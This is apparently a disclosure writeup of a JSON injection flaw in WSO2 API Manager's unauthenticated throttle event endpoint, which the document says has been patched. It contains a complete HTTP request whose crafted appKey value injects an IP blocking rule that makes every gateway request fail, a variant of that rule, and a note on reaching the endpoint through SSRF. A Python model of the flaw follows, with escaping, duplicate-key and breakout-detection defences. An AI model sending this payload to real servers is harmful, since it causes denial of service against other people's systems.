WSO2 API Manager exposes an unauthenticated HTTP endpoint at /endpoints/throttleEventReceiver that feeds JSON events into the Siddhi CEP engine. The JSONOutputMapper wraps string values in double quotes without escaping them, so an attacker-controlled field (appKey) can close the JSON string boundary and inject a second payloadData object containing an arbitrary blocking condition. Because Jackson resolves duplicate keys last-value-wins, the injected payloadData overwrites the original. A single request is sufficient: Siddhi's emitOnStateChange fires on any new throttleKey, and the injected payloadData supplies its own "state":"true".
POST /endpoints/throttleEventReceiver HTTP/1.1
Host: target
Content-Type: application/json

{
  "event": {
    "payloadData": {
      "appKey": "\"},\"payloadData\":{\"blockingCondition\":\"IPRANGE\",\"conditionValue\":\"{}\",\"state\":\"true\",\"id\":1,\"tenantDomain\":\"carbon.super\"}}}}",
      "appTier": "10PerMin",
      "appTenant": "carbon.super"
    }
  }
}
Within two minutes, every API request on the gateway returns HTTP 500 (a NullPointerException in ThrottleConditionEvaluator.isIpLevelBlocked()) until the server is restarted. Replacing the empty conditionValue with a well-formed IPRANGE condition (startingIp 0.0.0.0, endingIp 0.0.0.0, invert true) produces HTTP 403 instead.
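The following Python is an added illustration, not code from WSO2 or from this writeup: it models the mapper defect described above (quote-wrapping without escaping) and the lenient last-value-wins parse that lets the second payloadData win, beside three defensive counterparts: a serializer that escapes, a parser that refuses duplicate keys, and an inbound check that flags payloadData string fields able to break out of a quoted value. The event layout and function names are assumptions, and the sample value is constructed after the request shown above.

```python
import json

# Constructed sample value, modelled on the request above: it closes the quoted
# appKey string and its object, then opens a second payloadData object.
INJECTED_APP_KEY = '"},"payloadData":{"blockingCondition":"IPRANGE","state":"true"}}}}'
SAMPLE_FIELDS = {"appKey": INJECTED_APP_KEY, "appTier": "10PerMin", "appTenant": "carbon.super"}


def naive_emit(fields: dict) -> str:
    """Models the flawed mapper: each value is wrapped in quotes but never escaped."""
    body = ",".join(f'"{k}":"{v}"' for k, v in fields.items())
    return '{"event":{"payloadData":{' + body + "}}}"


def safe_emit(fields: dict) -> str:
    """Hardened form: a real JSON serializer escapes embedded quotes, so the value stays a string."""
    return json.dumps({"event": {"payloadData": fields}})


def _no_duplicate_keys(pairs):
    """object_pairs_hook that rejects repeated keys instead of silently keeping the last one."""
    obj = {}
    for key, value in pairs:
        if key in obj:
            raise ValueError(f"duplicate key {key!r}")
        obj[key] = value
    return obj


def parse_first_document(doc: str, strict: bool = False) -> dict:
    """Parse the leading JSON value and ignore trailing bytes, as a lenient last-value-wins
    reader does; strict=True additionally refuses duplicate keys anywhere in the document."""
    decoder = json.JSONDecoder(object_pairs_hook=_no_duplicate_keys if strict else None)
    obj, _end = decoder.raw_decode(doc)
    return obj


def breakout_fields(request_body: str) -> list:
    """Inbound check for the event receiver: names the payloadData string fields whose value
    contains a quote or backslash and so could escape a naively quoted JSON string."""
    fields = json.loads(request_body).get("event", {}).get("payloadData", {})
    return sorted(k for k, v in fields.items() if isinstance(v, str) and ('"' in v or "\\" in v))


if __name__ == "__main__":
    print(parse_first_document(naive_emit(SAMPLE_FIELDS))["event"]["payloadData"])  # injected condition only
    print(parse_first_document(safe_emit(SAMPLE_FIELDS))["event"]["payloadData"]["appKey"] == INJECTED_APP_KEY)  # True
    print(breakout_fields(json.dumps({"event": {"payloadData": SAMPLE_FIELDS}})))  # ['appKey']
```

With strict=True the naively emitted document is rejected outright on the duplicate payloadData key, which is the parser-side mitigation a reader can apply independently of the serializer fix.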
In deployments where the management console is not directly exposed, SSRF vulnerabilities such as CVE-2026-2053 can be used to exploit this from the gateway.
This vulnerability was responsibly disclosed and has been patched by the vendor.